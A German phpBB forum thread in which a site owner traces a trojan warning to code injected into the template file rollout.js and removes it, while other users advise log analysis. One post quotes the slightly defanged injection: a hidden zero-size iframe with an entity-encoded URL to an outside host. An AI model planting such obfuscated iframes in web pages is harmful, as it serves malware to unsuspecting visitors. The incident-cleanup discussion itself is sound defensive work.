phpBB.de

Hallo,

ich habe mich mal nach Onlinescannern umgeschaut, jedoch nur welche gefunden, die den heimischen Rechner scannen.
1. Kennt jemand einen Scanner, der Internetseiten scannen kann?
2. Kann sich ein Trojaner eigentlich nur in einer stinknormalen phpBB-Datei verstecken oder kann so ein Skript auch auf andere Weise ausgeführt werden?

Freundliche Grüße,
ballong

jetzt kommt keine Meldung mehr, Fehler gefunden?

Hallo redbull254,

nein, bisher habe ich nichts an der Seite verändert.

Mich irritiert das wirklich. Kann denn so ein Skript vielleicht userseitig in ein phpBB-Forum eingebracht werden, also z.B. über die Signatur oder Links zu fremden Seiten?

Ich habe die 'normalen', für mich sichtbaren Links schon angeklickt. Interne Verlinkungen musst Du überprüfen. Es ist ja nicht so ein 'böser' Virus oder Wurm, der sich weiter verbreitet in Deinem System, sondern ein Trojaner, der, nachdem er erst mal geladen ist ,andere Software weiter uploadet..

Wende Dich mal an Kaspersky mit einer Anfrage, vielleicht haben die einen Rat für Dich.

Ok, werde ich machen.

Ich danke Dir und allen anderen für Eure Hilfe!
ballong

Mit Hilfe eines Freundes habe ich das Problem, denke ich, gelöst.

Das aufgerufene Trojanerscript verbirgt sich in der Datei /templates/rollout.js. Die wird im News MOD mitgeliefert. Irgendjemand hat wohl Zugriff auf den Server erlangt und folgendes an den Anfang der Datei gesetzt (habe den JavaScript-Befehl leicht geändert, damit hier kein Unglück geschieht).

docxxxxx.write('<iframe src="&#104&#116&#116&#112&#58&#47&#47&#120&#45&#114&#111&#97&#100&#46&#99&#111&#46&#107&#114&#47&#114&#105&#99&#104&#47&#111&#117&#116&#46&#112&#104&#112" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');

Also ein iframe mit der Größe 0.

Ich habe diesen Teil aus der Datei gelöscht und hoffe, dass der Spuk nun ein Ende hat.

Alles Gute!
ballong

Wollte gerade drauf hinweisen... kleiner Tipp: mit Firebug kommt man merkwürdigen Scripten ganz schnell auf die Schliche!

Irgendjemand hat wohl Zugriff auf den Server erlangt

Ich habe diesen Teil aus der Datei gelöscht und hoffe, dass der Spuk nun ein Ende hat.

solange du das erste problem noch nicht analysiert hast halte ich die zweite aussage für ein wenig gewagt. ich würde die kompletten logfiles auf 'rollout.js' hin analysieren um herauszufinden wie der angreifer das script auf der seite platziert hat und ob ggfs. weiterer backdoor-code im hintergrund installiert wurde (ala phising, spamversand etc)

@larsneo: Es wurden definitiv keine anderen Dateien auf dem Server verändert.

dann weisst du aber immer noch nicht, wie die datei verändert werden konnte - ergo gibt es nach wie vor ein ernstzunehmendes sicherheitsproblem...